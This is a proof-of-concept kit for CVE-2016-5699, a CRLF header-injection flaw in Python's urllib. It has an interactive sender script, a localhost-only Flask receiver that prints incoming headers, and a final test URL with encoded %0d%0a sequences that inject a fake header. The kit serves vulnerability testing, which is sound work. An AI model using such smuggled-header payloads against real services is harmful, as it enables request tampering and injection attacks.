참고 : https://github.com/bunseokbot/CVE-2016-5699-poc
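"""Interactive probe for HTTP header injection through urllib.

Reads URLs from the prompt, requests each one with urllib.request and
prints the response headers. It is meant to be pointed at a listener you
control, so you can see which request headers the interpreter's urllib
actually put on the wire for a given URL.
"""
import traceback
import urllib.request

# Upper bound for one request, so an unresponsive listener cannot hang the
# prompt indefinitely.
REQUEST_TIMEOUT_SECONDS = 10


def _fetch_headers(url):
    """Request *url* and return its response headers, closing the response.

    The URL is handed to urlopen() unmodified on purpose: the object under
    test is how the running interpreter's urllib treats the URL it is given.
    If urllib rejects the URL it raises here, and the caller prints the
    traceback. NOTE(review): presumably that is the "not affected" outcome;
    confirm against the advisory linked in the banner.

    urlopen() also accepts non-HTTP schemes such as file:, so this helper
    belongs in an interactive test tool only, never behind untrusted input.
    """
    with urllib.request.urlopen(url, timeout=REQUEST_TIMEOUT_SECONDS) as response:
        return response.info()


def main():
    """Run the prompt loop until Ctrl-C or end of input on stdin."""
    print("#######################################")
    print("Testing HTTP Header injection in Python")
    print("Origin : http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html")
    print("bunseokbot@UpRoot")
    print("#######################################")

    try:
        while True:
            try:
                url = input("URL : ")
            except EOFError:
                # stdin was closed or the piped input ran out. Without this
                # branch the generic handler below would catch EOFError on
                # every iteration and print tracebacks forever.
                break

            try:
                print(_fetch_headers(url))
            except Exception:
                # Best effort by design: a failed or rejected request is a
                # result worth showing, then the prompt comes back.
                print(traceback.format_exc())
    except KeyboardInterrupt:
        print("KeyboardInterrupt event found!\nTerminating Program..")


if __name__ == "__main__":
    main()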
receiver.py
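"""Local receiver that prints the headers of every request to /vulntest.

Run it next to the sender script and read the dump on stdout to see which
headers actually arrived.
"""
from flask import Flask, request

app = Flask(__name__)
# Flask's debug mode is deliberately left off. It enables the Werkzeug
# interactive debugger, which can evaluate Python inside this process, and a
# receiver that only prints headers gains nothing from it.

# The listener is meant to be reachable from this machine only. The address
# is spelled out so that this does not depend on app.run()'s default host.
BIND_HOST = "127.0.0.1"
BIND_PORT = 12345


@app.route("/vulntest")
def vulntest():
    """Print the incoming request's headers to stdout and return an empty body."""
    rule = "###############################################"
    print(rule)
    print("Request Header")
    print(rule)
    # request.headers is printed as received; header names and values are
    # controlled by the client and should be read as untrusted data.
    print(request.headers)
    print(rule)
    return ''


if __name__ == "__main__":
    app.run(host=BIND_HOST, port=BIND_PORT, threaded=True)  # localhost only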
TEST URL : http://127.0.0.1%0d%0aInjection-success:%20success%0d%0adummy:%20:12345/vulntest